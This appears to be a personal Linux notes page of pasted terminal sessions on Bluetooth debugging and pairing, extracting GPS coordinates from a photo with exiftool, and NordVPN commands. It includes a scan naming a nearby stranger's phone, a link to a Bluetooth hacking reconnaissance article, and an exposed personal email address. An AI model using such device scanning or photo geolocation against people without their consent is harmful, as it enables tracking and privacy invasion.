Complete (0x01) plen 1 #2 [hci0] 8.806555 Status: Success (0x00) < HCI Command: LE Set Scan Enable (0x08|0x000c) plen 2 #3 [hci0] 8.813057 Scanning: Disabled (0x00) Filter duplicates: Disabled (0x00) > HCI Event: Command Complete (0x0e) plen 4 #4 [hci0] 8.814487 LE Set Scan Enable (0x08|0x000c) ncmd 2 Status: Success (0x00) @ MGMT Event: Device Found (0x0012) plen 33 {0x0003} [hci0] 8.814575 LE Address: D8:80:39:F9:A5:4A (Microchip Technology Inc.) RSSI: -86 dBm (0xaa) Flags: 0x00000000 Data length: 19 Flags: 0x02 LE General Discoverable Mode Name (complete): MD88039F9-A54A @ MGMT Event: Device Found (0x0012) plen 33 {0x0001} [hci0] 8.814575 LE Address: D8:80:39:F9:A5:4A (Microchip Technology Inc.) RSSI: -86 dBm (0xaa) Flags: 0x00000000 Data length: 19 Flags: 0x02 LE General Discoverable Mode Name (complete): MD88039F9-A54A @ MGMT Event: Discovering (0x0013) plen 2 {0x0003} [hci0] 8.814642 Address type: 0x07 BR/EDR LE Public LE Random Discovery: Disabled (0x00) $ sudo /etc/init.d/bluetooth status bluetooth.service - Bluetooth service Loaded: loaded (/lib/systemd/system/bluetooth.service; disabled; vendor preset: disabled) Active: active (running) since Thu 2019-11-07 12:39:35 EST; 10h ago Docs: man:bluetoothd(8) Main PID: 2736 (bluetoothd) Status: "Running" Tasks: 1 (limit: 4915) Memory: 1.4M CGroup: /system.slice/bluetooth.service 2736 /usr/lib/bluetooth/bluetoothd Nov 07 23:14:10 wintermute bluetoothd[2736]: Sap driver initialization failed. Nov 07 23:14:10 wintermute bluetoothd[2736]: sap-server: Operation not permitted (1) Nov 07 23:14:10 wintermute bluetoothd[2736]: RFCOMM server failed for Headset Voice gatewa… (98) Nov 07 23:14:10 wintermute bluetoothd[2736]: RFCOMM server failed for :1.74/Profile/HSPHSP… (98) Nov 07 23:14:10 wintermute bluetoothd[2736]: Failed to set mode: Blocked through rfkill (0x12) Nov 07 23:14:10 wintermute bluetoothd[2736]: Endpoint registered: sender=:1.201 path=/Medi…k/sbc Nov 07 23:14:10 wintermute bluetoothd[2736]: Endpoint registered: sender=:1.201 path=/Medi…e/sbc Nov 07 23:14:10 wintermute bluetoothd[2736]: Endpoint registered: sender=:1.74 path=/Media…k/sbc Nov 07 23:14:10 wintermute bluetoothd[2736]: Endpoint registered: sender=:1.74 path=/Media…e/sbc Nov 07 23:14:10 wintermute bluetoothd[2736]: Failed to set mode: Blocked through rfkill (0x12) Hint: Some lines were ellipsized, use -l to show in full. https://www.hackers-arise.com/single-post/2018/01/30/BlueTooth-Hacking-Part-2-BlueTooth-Reconnaissance $ sudo hciconfig hciconfig - HCI device configuration utility hci0: Type: Primary Bus: USB BD Address: FC:F8:AE:26:86:F2 ACL MTU: 1021:5 SCO MTU: 96:5 DOWN RX bytes:1295 acl:0 sco:0 events:148 errors:0 TX bytes:25328 acl:0 sco:0 commands:147 errors:0 $ sudo hciconfig hci0 up Can't init device hci0: Operation not possible due to RF-kill (132) parth@wintermute:~$ $ sudo hcitool scan Device is not available: No such device $ sudo /etc/init.d/bluetooth start Starting bluetooth (via systemctl): bluetooth.service. $ sudo hcitool inq Inquiring ... Inquiry failed.: No such device $ sudo sdptool --help sdptool - SDP tool v5.50 Usage: sdptool [options] <command> [command parameters] Options: -h Display help -i Specify source interface Commands: search Search for a service browse Browse all available services records Request all records add Add local service del Delete local service get Get local service setattr Set/Add attribute to a SDP record setseq Set/Add attribute sequence to a SDP record Services: DID SP DUN LAN FAX OPUSH FTP PRINT HS HSAG HF HFAG SAP PBAP MAP NAP GN PANU HCRP HID KEYB WIIMOTE CIP CTP A2SRC A2SNK AVRCT AVRTG UDIUE UDITE SEMCHLA SR1 SYNCML SYNCMLSERV ACTIVESYNC HOTSYNC PALMOS NOKID PCSUITE NFTP NSYNCML NGAGE APPLE IAP ISYNC GATT $ l2ping l2ping - L2CAP ping Usage: l2ping [-i device] [-s size] [-c count] [-t timeout] [-d delay] [-f] [-r] [-v] <bdaddr> -f Flood ping (delay = 0) -r Reverse ping -v Verify request and response payload $ sudo btscanner Opening the OUI database Reading the OUI database Finished reading the OUI database No Bluetooth devices available parth@wintermute:~$ sudo btscanner --help Usage: btscanner [options] options --help Display help --cfg=<file> Use <file> as the config file --no-reset Do not reset the Bluetooth adapter before scanning parth@wintermute:~$ $ sudo rfcomm --help RFCOMM configuration utility ver 5.50 Usage: rfcomm [options] <command> <dev> Options: -i, --device [hciX|bdaddr] Local HCI device or BD Address -h, --help Display help -r, --raw Switch TTY into raw mode -A, --auth Enable authentication -E, --encrypt Enable encryption -S, --secure Secure connection -M, --master Become the master of a piconet -L, --linger [seconds] Set linger timeout -a Show all devices (default) Commands: bind <dev> <bdaddr> [channel] Bind device release <dev> Release device show <dev> Show device connect <dev> <bdaddr> [channel] Connect device listen <dev> [channel [cmd]] Listen watch <dev> [channel [cmd]] Watch $ sudo /etc/init.d/bluetooth start Starting bluetooth (via systemctl): bluetooth.service. parth@wintermute:~$ sudo /etc/init.d/bluetooth status $ sudo /etc/init.d/bluetooth status bluetooth.service - Bluetooth service Loaded: loaded (/lib/systemd/system/bluetooth.service; disabled; vendor preset: disabled) Active: active (running) since Thu 2019-11-07 12:39:35 EST; 10h ago Docs: man:bluetoothd(8) Main PID: 2736 (bluetoothd) Status: "Running" Tasks: 1 (limit: 4915) Memory: 1.4M CGroup: /system.slice/bluetooth.service 2736 /usr/lib/bluetooth/bluetoothd Nov 07 23:14:10 wintermute bluetoothd[2736]: Sap driver initialization failed. Nov 07 23:14:10 wintermute bluetoothd[2736]: sap-server: Operation not permitted (1) Nov 07 23:14:10 wintermute bluetoothd[2736]: RFCOMM server failed for Headset Voice gatewa… (98) Nov 07 23:14:10 wintermute bluetoothd[2736]: RFCOMM server failed for :1.74/Profile/HSPHSP… (98) Nov 07 23:14:10 wintermute bluetoothd[2736]: Failed to set mode: Blocked through rfkill (0x12) Nov 07 23:14:10 wintermute bluetoothd[2736]: Endpoint registered: sender=:1.201 path=/Medi…k/sbc Nov 07 23:14:10 wintermute bluetoothd[2736]: Endpoint registered: sender=:1.201 path=/Medi…e/sbc Nov 07 23:14:10 wintermute bluetoothd[2736]: Endpoint registered: sender=:1.74 path=/Media…k/sbc Nov 07 23:14:10 wintermute bluetoothd[2736]: Endpoint registered: sender=:1.74 path=/Media…e/sbc Nov 07 23:14:10 wintermute bluetoothd[2736]: Failed to set mode: Blocked through rfkill (0x12) Hint: Some lines were ellipsized, use -l to show in full. $ rfkill list all 0: dell-rbtn: Wireless LAN Soft blocked: no Hard blocked: no 1: phy0: Wireless LAN Soft blocked: no Hard blocked: no 5: hci0: Bluetooth Soft blocked: yes Hard blocked: no $ sudo rfkill unblock bluetooth parth@wintermute:~$ rfkill list all 0: dell-rbtn: Wireless LAN Soft blocked: no Hard blocked: no 1: phy0: Wireless LAN Soft blocked: no Hard blocked: no 5: hci0: Bluetooth Soft blocked: no Hard blocked: no $ sudo systemctl enable bluetooth.service Synchronizing state of bluetooth.service with SysV service script with /lib/systemd/systemd-sysv-install. Executing: /lib/systemd/systemd-sysv-install enable bluetooth Created symlink /etc/systemd/system/dbus-org.bluez.service → /lib/systemd/system/bluetooth.service. Created symlink /etc/systemd/system/bluetooth.target.wants/bluetooth.service → /lib/systemd/system/bluetooth.service. $ sudo systemctl enable bluetooth.service Synchronizing state of bluetooth.service with SysV service script with /lib/systemd/systemd-sysv-install. Executing: /lib/systemd/systemd-sysv-install enable bluetooth
More bluetooth stuff
┌──(parth㉿parth)-[~] └─$ btmgmt info Index list with 1 item hci0: Primary controller addr B0:7D:64:E7:BA:A7 version 11 manufacturer 2 class 0x7c010c supported settings: powered connectable fast-connectable discoverable bondable link-security ssp br/edr hs le advertising secure-conn debug-keys privacy configuration static-addr phy-configuration wide-band-speech current settings: powered connectable discoverable bondable ssp br/edr le secure-conn name parth short name hci0: Configuration options supported options: public-address missing options: ┌──(parth㉿parth)-[~] └─$ sudo btmgmt le-oob LE Device Address: B0:7D:64:E7:BA:A7 (public) LE Role: 0x01 LE SC Confirmation Value: eb209fad0e7541dc774e91e1ac28833f LE SC Random Value: 241893696c78452fa850b0a74ad11967 Flags: 0x02 ┌──(parth㉿parth)-[~] └─$ sudo btmgmt secinfo Primary controller (hci0) Info length: 15 Flags: 0x0f Max Key Size (BR/EDR): 16 Max Key Size (LE): 16 Type 4: 2 bytes ┌──(parth㉿parth)-[~] └─$ sudo btmgmt read-sysconfig Type: 0x0000 Length: 02 Value: 0000 Type: 0x0001 Length: 02 Value: 0008 Type: 0x0002 Length: 02 Value: 1200 Type: 0x0003 Length: 02 Value: 0000 Type: 0x0004 Length: 02 Value: 0000 Type: 0x0005 Length: 02 Value: 0000 Type: 0x0006 Length: 02 Value: 0000 Type: 0x0007 Length: 02 Value: 0000 Type: 0x0008 Length: 02 Value: 5000 Type: 0x0009 Length: 02 Value: 2003 Type: 0x000a Length: 02 Value: 0008 Type: 0x000b Length: 02 Value: 0008 Type: 0x000c Length: 02 Value: 0200 Type: 0x000d Length: 02 Value: 6000 Type: 0x000e Length: 02 Value: 3000 Type: 0x000f Length: 02 Value: 0004 Type: 0x0010 Length: 02 Value: 1200 Type: 0x0011 Length: 02 Value: 1200 Type: 0x0012 Length: 02 Value: 1200 Type: 0x0013 Length: 02 Value: 6000 Type: 0x0014 Length: 02 Value: 3000 Type: 0x0015 Length: 02 Value: 6000 Type: 0x0016 Length: 02 Value: 6000 Type: 0x0017 Length: 02 Value: 1800 Type: 0x0018 Length: 02 Value: 2800 Type: 0x0019 Length: 02 Value: 0000 Type: 0x001a Length: 02 Value: 2a00 Type: 0x001b Length: 02 Value: a00f Type: 0x001d Length: 02 Value: 2c01 Type: 0x001e Length: 02 Value: f401 Type: 0x001f Length: 01 Value: 00 ┌──(parth㉿parth)-[~] └─$ hciconfig commands hci0: Type: Primary Bus: USB BD Address: B0:7D:64:E7:BA:A7 ACL MTU: 1021:4 SCO MTU: 96:6 UP RUNNING PSCAN ISCAN RX bytes:15053 acl:125 sco:0 events:825 errors:0 TX bytes:22893 acl:104 sco:0 commands:610 errors:0 ┌──(parth㉿parth)-[~] └─$ hcitool dev Devices: hci0 B0:7D:64:E7:BA:A7 Capture the traces from hci0 to hcidump.log file $ btmon -i hci0 -w hcidump.log Open the trace file $ btmon -r hcidump.log Live debugging: $ sudo btmon Saving it for later: $ sudo btmon --write ~/hcitrace.snoop Wireshark can open the snoop files and with its powerful abilities to filter out and colorize packets, it is a handy tool. Someone who knows a bit about Bluetooth might benefit a lot just by reading those logs. https://git.kernel.org/pub/scm/bluetooth/bluez.git/tree/doc/btsnoop.txt pi@RPi3:~ $ bluetoothctl [bluetooth]# set-scan-filter-clear SetDiscoveryFilter success [bluetooth]# scan on Discovery started Once we know the Service UUID we can filter to see just Eddystone beacons in bluetoothctl. For example: [bluetooth]# set-scan-filter-uuids 0xfeaa SetDiscoveryFilter success [bluetooth]# scan on Discovery started ┌──(parth㉿parth)-[/var/log] └─$ bluetoothd -v 5.66 ┌──(parth㉿parth)-[/var/log] └─$ tcpdump --version tcpdump version 4.99.3 libpcap version 1.10.3 (with TPACKET_V3) OpenSSL 3.0.8 7 Feb 2023 ┌──(parth㉿parth)-[/var/log] └─$ tcpdump -D 1.wlan0 [Up, Running, Wireless, Associated] 2.any (Pseudo-device that captures on all interfaces) [Up, Running] 3.lo [Up, Running, Loopback] 4.wlan1 [Up, Wireless] 5.eth0 [Up, Disconnected] 6.bluetooth0 (Bluetooth adapter number 0) [Wireless, Association status unknown] 7.bluetooth-monitor (Bluetooth Linux Monitor) [Wireless] 8.nflog (Linux netfilter log (NFLOG) interface) [none] 9.nfqueue (Linux netfilter queue (NFQUEUE) interface) [none] 10.dbus-system (D-Bus system bus) [none] 11.dbus-session (D-Bus session bus) [none] Now that we know the name of the Bluetooth interface let's setup a capture on bluetooth0 to see if there is any explanation for the connection issues. To setup the capture, use TCPDump on the Linux machine to capture and write the packet data from the bluetooth0 interface to a pcap file for later examination. Next, attempt to establish the Bluetooth connection between the Linux and macOS machine and attempt to send a file or tow over that connection to provide some clues as to what might be happening. To setup a TCPDump capture, run this command: # Capture bluetooth packets and write them to a pcap file called bluetooth0_capture_12_10.pcap $ tcpdump -i bluetooth0 -w bluetooth0_capture_12_12.pcap bluetoothctl is the command for pairing the system with a device. bluetoothctl [1] is the main command for configuring Bluetooth devices on Linux. Contrary to what the name's structure might lead you to expect, bluetoothctl is not part of systemd, but rather a simple set of options for setting up Bluetooth devices. In its current version, bluetoothctl works only with MAC addresses. Many devices allow you to change the name, which can reduce the possibility of confusion if you have two devices of the same kind from the same manufacturer. However, while bluetoothctl may list device names, its options do not work with the device names. systemctl status bluetooth systemctl start bluetooth https://www.linux-magazine.com/Issues/2017/197/Command-Line-bluetoothctl -------- Identify your computer bluetooth $ hcitool dev Devices: hci0 A3:3E:XX:XX:G3:86 Scan available devices $ hcitool -i hci0 scan Scanning ... FC:XX:XX:XX:XX:FE n/a Trust the discovered device $ bluetoothctl [bluetooth]# trust FC:XX:XX:XX:XX:FE [CHG] Device FC:XX:XX:XX:XX:FE Trusted: yes Connect [bluetooth]# connect FC:XX:XX:XX:XX:FE Attempting to connect to FC:XX:XX:XX:XX:FE Connection successful [E7]# Extras [E7]# paired-devices Device FC:XX:XX:XX:XX:FE E7 [bluetooth]# list [bluetooth]# show [bluetooth]# select 70:1A:04:59:69:04 https://lynxbee.com/scan-pair-connect-to-bluetooth-device-from- ubuntu-from-command-line-using-bluetoothctl/#.Yn7063X32Uk [bluetooth]# connect A8:2B:B9:1C:39:C7 [bluetooth]# info [bluetooth]# meun gatt [bluetooth]# help [bluetooth]# [bluetooth]# [bluetooth]# [bluetooth]# [bluetooth]# https://budimir.cc/2020/02/27/ble-on-linux-with-bluetoothctl/ A8:2B:B9:1C:39:C7 ┌──(parth㉿Parth)-[~] └─$ hcitool dev Devices: hci1 08:BE:AC:13:FF:0F hci0 B0:7D:64:E7:BA:A7 ┌──(parth㉿Parth)-[~] └─$ hcitool -i hci0 scan Scanning ... A8:2B:B9:1C:39:C7 William's Galaxy Note9 ┌──(parth㉿Parth)-[~] └─$ hcitool -i hci1 scan Scanning ... A8:2B:B9:1C:39:C7 William's Galaxy Note9 -------- sudo systemctl status bluetooth sudo systemctl enable bluetooth sudo systemctl start bluetooth bluetoothctl scan on bluetoothctl discoverable on bluetoothctl pair FC:69:47:7C:9D:A3 bluetoothctl connect FC:69:47:7C:9D:A3 bluetoothctl paired-devices bluetoothctl devices bluetoothctl trust FC:69:47:7C:9D:A3 bluetoothctl untrust FC:69:47:7C:9D:A3 bluetoothctl remove FC:69:47:7C:9D:A3 bluetoothctl disconnect FC:69:47:7C:9D:A3 bluetoothctl block FC:69:47:7C:9D:A3
---[GPS]--- (top)
This is how to pull gps coordinates from an image and display a map of the location.
Run this command to report the gps info. You can use a wildcard such as *.jpg.
$ exiftool -aps:all -c "%.6f degrees" 20190117_152351.jpg GPS Latitude Ref : North GPS Latitude : 38.189984 degrees GPS Longitude Ref : West GPS Longitude : 84.834734 degrees GPS Altitude Ref : Above Sea Level GPS Altitude : 0 m GPS Time Stamp : 20:23:38 GPS Processing Method : CELLID GPS Date Stamp : 2019:01:17
Using the info above, develope the following string:
38.189984 N 84.834734 W
Enter this string as a google search term. You will get a map.
Commands: $ nordvpn help $ sudo nordvpn login $ sudo nordvpn connect $ sudo nordvpn disconnect $ nordvpn set help $ sudo nordvpn set protocol udp $ sudo nordvpn set killswitch enable $ sudo nordvpn set cybersec disable $ sudo nordvpn settings $ sudo nordvpn countries $ sudo nordvpn cities Germany $ sudo nordvpn connect Germany Frankfurt $ sudo nordvpn status $ sudo nordvpn logout $ systemctl status nordvpnd $ sudo nordvpn setting $ sudo nordvpn set dns [server address] $ sudo nordvpn set dns 1.1.1.1 8.8.8.8 Interesting: You can connect to the specific server by nordvpn c us1231 nordvpn set autoconnect on romania If you want to get back to the original NordVPN DNS servers, then apply the following: nordvpn set dns off These are our (Nord) DNS servers: 162.242.211.137 and 78.46.223.24 domain nordvpn.com nameserver 103.86.96.100 nameserver 103.86.99.100 $ nordvpn countries Albania Estonia Latvia Slovakia Argentina Finland Lithuania Slovenia Australia France Luxembourg South_Africa Austria Georgia Malaysia South_Korea Belgium Germany Mexico Spain Bosnia_And_Herzegovina Greece Moldova Sweden Brazil Hong_Kong Netherlands Switzerland Bulgaria Hungary New_Zealand Taiwan Canada Iceland North_Macedonia Thailand Chile India Norway Turkey Costa_Rica Indonesia Poland Ukraine Croatia Ireland Portugal United_Kingdom Cyprus Israel Romania United_States Czech_Republic Italy Serbia Vietnam Denmark Japan Singapore $ nordvpn cities Switzerland Zurich $ nordvpn cities United_States Atlanta Chicago Kansas_City Miami Saint_Louis Seattle Buffalo Dallas Los_Angeles New_York Salt_Lake_City Charlotte Denver Manassas Phoenix San_Francisco
Welcome to NordVPN Linux client app! Version 3.12.5 Website: https://nordvpn.com Usage: nordvpn [global options] command [command options] [arguments...] Commands: account Shows account information cities Shows a list of cities where servers are available connect, c Connects you to VPN countries Shows a list of countries where servers are available disconnect, d Disconnects you from VPN groups Shows a list of available server groups login Logs you in logout Logs you out rate Rates your last connection quality (1-5) register Registers a new user account set, s Sets a configuration option settings Shows current settings status Shows connection status version Shows the app version whitelist Adds or removes an option from a whitelist help, h Shows a list of commands or help for one command Global options: --help, -h show help (default: false) --version, -v print the version (default: false) For more detailed information, please check manual page. Our customer support works 24/7 so if you have any questions or issues, drop us a line at https://support.nordvpn.com/ -------- NordVPN for Linux successfully installed! To get started, please re-login or execute `su - $USER` in the current shell, type 'nordvpn login' and enter your NordVPN account details. Then type 'nordvpn connect' and you’re all set! To allow other users to use the application run 'usermod -aG nordvpn otheruser'. If you need help using the app, use the command 'nordvpn --help'. $ nordvpn login Continue in the browser: https://zwyr157wwiu6eior.com/v1/users/oauth/login-redirect? attempt=020f7f1e-70fe-4f16-a133-552a4cee2731 nordvpn login nordvpn connect $ nordvpn connect Connecting to United States #8052 (us8052.nordvpn.com) You are connected to United States #8052 (us8052.nordvpn.com)! $ nordvpn account Account Information: Email Address: wbbellamy@gmail.com VPN Service: Active (Expires on Mar 26th, 2024) $ nordvpn settings Technology: OPENVPN Protocol: UDP Firewall: enabled Kill Switch: disabled CyberSec: disabled Obfuscate: disabled Notify: disabled Auto-connect: disabled IPv6: disabled DNS: disabled $ nordvpn status Status: Connected Current server: us8052.nordvpn.com Country: United States City: Atlanta Server IP: 92.119.17.75 Current technology: OPENVPN Current protocol: UDP Transfer: 2.21 MiB received, 1.27 MiB sent Uptime: 3 minutes 53 seconds Settings To access the NordVPN client settings, type the nordvpn command in Terminal. Here is the list of available commands: nordvpn login - Log in. nordvpn connect or nordvpn c - Connect to VPN. To connect to specific servers, use nordvpn connect (country_code server_number) (eg. nordvpn connect uk715) nordvpn disconnect or nordvpn d - Disconnect from VPN. nordvpn connect US -g double_vpn - Connect to a Double VPN server where the first hop is a specific country nordvpn connect P2P - connect to a P2P server. nordvpn connect The_Americas - connect to servers located in the Americas. nordvpn connect Dedicated_IP - connect to a Dedicated IP server. nordvpn set or nordvpn s - Set a configuration option. Possible options: nordvpn set cybersec on or off - Enable or disable CyberSec nordvpn set killswitch on or off - Enable or disable Kill Switch nordvpn set autoconnect on or off - Enable or disable auto-connect. You can set a specific server for automatic connection using nordvpn set autoconnect on country_code+server_number. Example: nordvpn set autoconnect on us2435. nordvpn set notify on or off - Enable or disable notifications nordvpn set dns 1.1.1.1 1.0.0.1 - Set custom DNS (you can set up a single DNS or two like shown in this command). nordvpn set protocol udp or tcp - Switch between UDP and TCP protocols nordvpn set obfuscate on or off - Enable or disable Obfuscated Servers. nordvpn set technology - Set connection technology (OpenVPN or NordLynx) nordvpn whitelist add port 22 - Add a rule to whitelist a specified incoming port. You can also whitelist multiple ports — just separate their numbers with a space. nordvpn whitelist remove port 22 - Remove the rule to whitelist a specified port. nordvpn whitelist add subnet 192.168.0.0/16 - Add a rule to whitelist a specified subnet. nordvpn whitelist remove subnet 192.168.0.0/16 - Remove the rule to whitelist a specified subnet. nordvpn account - See account information nordvpn register - Register a new user account nordvpn rate - Rate your last connection quality (1-5) nordvpn settings - See the current settings. nordvpn status - See the connection status. nordvpn countries - See the country list. nordvpn cities- See the city list. E.g.: nordvpn cities united_states nordvpn groups - See a list of available server groups. nordvpn logout - Log out. nordvpn help or nordvpn h - See the list of available commands or help for a specific command. You can get an extensive explanation of all commands by using the man nordvpn command in Terminal. Here's how to disable the protocol on a Debian-based machine. Open a terminal window. Type this command: sudo nano /etc/sysctl.conf Add the following at the bottom of the file: net.ipv6.conf.all.disable_ipv6 = 1 net.ipv6.conf.default.disable_ipv6 = 1 net.ipv6.conf.lo.disable_ipv6 = 1 net.ipv6.conf.tun0.disable_ipv6 = 1 Save and close the file. Reboot the device. To re-enable IPv6, remove the above lines from /etc/sysctl.conf and reboot the device. https://support.nordvpn.com/Connectivity/Linux/1047409422/How-can-I- connect-to-NordVPN-using-Linux-Terminal.htm $ man nordvpn $ nordvpn help $ sudo nordvpn connect $ sudo nordvpn disconnect $ nordvpn set help $ sudo nordvpn set protocol udp $ sudo nordvpn set killswitch enable $ sudo nordvpn set cybersec enable $ sudo nordvpn set obfuscate disable $ sudo nordvpn set autoconnect enable $ sudo nordvpn set dns 1.1.1.1 8.8.8.8 $ sudo nordvpn set dns disable $ sudo nordvpn whitelist add port 22 protocol TCP $ sudo nordvpn whitelist remove port 80 protocol TCP $ sudo nordvpn settings $ sudo nordvpn countries $ sudo nordvpn cities Germany $ sudo nordvpn connect Germany Frankfurt $ sudo nordvpn status $ sudo nordvpn logout Reset your Linux settings; sudo rm /var/lib/nordvpn/data/settings.dat $ nordvpn c Double_VPN Connecting to United States - Canada #36 (us-ca36.nordvpn.com) You are connected to United States - Canada #36 (us-ca36.nordvpn.com)! $ nordvpn c Double_VPN Connecting to Canada - United States #55 (ca-us55.nordvpn.com) You are connected to Canada - United States #55 (ca-us55.nordvpn.com)! Using the following command, you can get a list of all the available countries and cities: nordvpn countries nordvpn cities nordvpn connect United_Kingdom Manchester Display firewall configuration defined by the service. $ sudo iptables -L -v -n Display service configuration. $ cat ~/.config/nordvpn/nordvpn.conf Display DNS configuration. $ cat /etc/resolv.conf Display service status. $ systemctl status nordvpnd When connected to NordVPN; $ traceroute 8.8.8.8 traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets 1 10.8.3.1 (10.8.3.1) 45.332 ms 45.332 ms 45.330 ms 2 * * * 3 148.72.136.2 (148.72.136.2) 52.277 ms 52.290 ms 52.287 ms 4 ae1.stl1-cr-rigel.bb.gdinf.net (207.38.95.9) 45.251 ms 46.302 ms 46.306 ms 5 stlo-b1-link.ip.twelve99.net (62.115.165.90) 46.313 ms 46.309 ms 46.309 ms 6 stlo-b3-link.ip.twelve99.116.115.62.in-addr.arpa (62.115.116.54) 46.267 ms 43.686 ms 43.689 ms 7 stlo-b1-link.ip.twelve99.net (62.115.135.194) 43.698 ms 43.680 ms 43.649 ms 8 chi-b23-link.ip.twelve99.net (62.115.113.173) 50.635 ms 50.637 ms 50.642 ms 9 google-ic326615-chi-b23.ip.twelve99-cust.net (80.239.128.33) 50.538 ms 50.572 ms 50.576 ms 10 * * * 11 dns.google (8.8.8.8) 51.312 ms 51.359 ms 51.364 ms When not connected to NordVPN; $ traceroute 8.8.8.8 traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets 1 dsldevice.attlocal.net (192.168.1.254) 5.481 ms 5.436 ms 5.419 ms 2 104-52-8-1.lightspeed.lsvlky.sbcglobal.net (104.52.8.1) 7.889 ms 7.874 ms 7.859 ms 3 99.186.140.206 (99.186.140.206) 7.844 ms 8.483 ms 8.468 ms 4 * * * 5 * * * 6 * * * 7 * * * 8 32.130.17.55 (32.130.17.55) 15.792 ms 15.773 ms 15.757 ms 9 12.255.10.8 (12.255.10.8) 15.971 ms 15.724 ms 15.695 ms 10 * * * 11 dns.google (8.8.8.8) 15.676 ms 15.670 ms 15.665 ms With Double Double_VPN $ traceroute 8.8.8.8 traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets 1 10.8.8.1 (10.8.8.1) 49.635 ms 49.637 ms 49.636 ms 2 10.0.2.2 (10.0.2.2) 90.082 ms 90.098 ms 90.097 ms 3 212.103.48.57 (212.103.48.57) 90.094 ms 90.092 ms 90.136 ms 4 * * * 5 217.138.223.36 (217.138.223.36) 90.042 ms 217.138.223.38 (217.138.223.38) 90.040 ms 217.138.223.36 (217.138.223.36) 90.050 ms 6 74.125.51.94 (74.125.51.94) 90.026 ms 142.250.47.56 (142.250.47.56) 88.105 ms 88.046 ms 7 108.170.248.97 (108.170.248.97) 85.643 ms 108.170.248.33 (108.170.248.33) 100.519 ms 108.170.248.97 (108.170.248.97) 100.409 ms 8 142.251.65.93 (142.251.65.93) 100.346 ms 142.251.65.103 (142.251.65.103) 100.366 ms 216.239.62.25 (216.239.62.25) 100.398 ms 9 dns.google (8.8.8.8) 100.371 ms 100.346 ms 100.366 ms With Double VPN $ ping 8.8.8.8 PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data. 64 bytes from 8.8.8.8: icmp_seq=2 ttl=118 time=78.7 ms 64 bytes from 8.8.8.8: icmp_seq=3 ttl=118 time=191 ms 64 bytes from 8.8.8.8: icmp_seq=4 ttl=118 time=216 ms 64 bytes from 8.8.8.8: icmp_seq=5 ttl=118 time=96.4 ms 64 bytes from 8.8.8.8: icmp_seq=6 ttl=118 time=102 ms 64 bytes from 8.8.8.8: icmp_seq=7 ttl=118 time=188 ms 64 bytes from 8.8.8.8: icmp_seq=8 ttl=118 time=202 ms ^C --- 8.8.8.8 ping statistics --- 9 packets transmitted, 7 received, 22.2222% packet loss, time 8028ms rtt min/avg/max/mdev = 78.687/153.534/215.640/53.936 ms $ ifconfig eth0: flags=4099(UP,BROADCAST,MULTICAST) mtu 1500 ether c0:25:a5:16:53:2d txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73(UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 1000 (Local Loopback) RX packets 39 bytes 2131 (2.0 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 39 bytes 2131 (2.0 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 tun0: flags=4305(UP,POINTOPOINT,RUNNING,NOARP,MULTICAST) mtu 1500 inet 10.8.0.8 netmask 255.255.255.0 destination 10.8.0.8 unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC) RX packets 12891 bytes 4614321 (4.4 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 13033 bytes 1533296 (1.4 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 wlan0: flags=4163(UP,BROADCAST,RUNNING,MULTICAST) mtu 1500 inet 192.168.1.171 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 2600:1700:43f0:d60:fee4:4b1e:201d:1d21 prefixlen 64 scopeid 0x0 inet6 fe80::b27d:64ff:fee7:baa3 prefixlen 64 scopeid 0x20 inet6 2600:1700:43f0:d60::30 prefixlen 128 scopeid 0x0 inet6 2600:1700:43f0:d60:b27d:64ff:fee7:baa3 prefixlen 64 scopeid 0x0 ether b0:7d:64:e7:ba:a3 txqueuelen 1000 (Ethernet) RX packets 37827 bytes 31302546 (29.8 MiB) RX errors 0 dropped 733 overruns 0 frame 0 TX packets 21274 bytes 6021823 (5.7 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 https://support.nordvpn.com/Connectivity/Linux/1061938702/How-to-connect-to- NordVPN-using-Linux-Network-Manager.htm https://wiki.archlinux.org/title/NordVPN#Settings https://support.nordvpn.com/Connectivity/Linux/1047409422/How-can-I-connect- to-NordVPN-using-Linux-Terminal.htm To access the NordVPN client settings, type the nordvpn command in Terminal. Here is the list of available commands: nordvpn login - Log in. nordvpn connect or nordvpn c - Connect to VPN. To connect to specific servers, use nordvpn connect (country_code server_number) (eg. nordvpn connect uk715) nordvpn disconnect or nordvpn d - Disconnect from VPN. nordvpn c double_vpn - Connect to the closest Double VPN server. nordvpn connect --group double_vpn - Connect to a specific country using DoubleVPN servers. nordvpn connect P2P - connect to a P2P server. nordvpn connect The_Americas - connect to servers located in the Americas. nordvpn connect Dedicated_IP - connect to a Dedicated IP server. nordvpn set or nordvpn s - Set a configuration option. Possible options: nordvpn set cybersec on or off - Enable or disable CyberSec nordvpn set killswitch on or off - Enable or disable Kill Switch nordvpn set autoconnect on or off - Enable or disable auto-connect. You can set a specific server for automatic connection using nordvpn set autoconnect on country_code+server_number. Example: nordvpn set autoconnect on us2435. nordvpn set notify on or off - Enable or disable notifications nordvpn set dns 1.1.1.1 1.0.0.1 - Set custom DNS (you can set up a single DNS or two like shown in this command). nordvpn set protocol udp or tcp - Switch between UDP and TCP protocols nordvpn set obfuscate on or off - Enable or disable Obfuscated Servers. nordvpn set technology - Set connection technology (OpenVPN or NordLynx) nordvpn whitelist add port 22 - Add a rule to whitelist a specified incoming port. You can also whitelist multiple ports — just separate their numbers with a space. nordvpn whitelist remove port 22 - Remove the rule to whitelist a specified port. nordvpn whitelist add subnet 192.168.0.0/16 - Add a rule to whitelist a specified subnet. nordvpn whitelist remove subnet 192.168.0.0/16 - Remove the rule to whitelist a specified subnet. nordvpn account - See account information nordvpn register - Register a new user account nordvpn 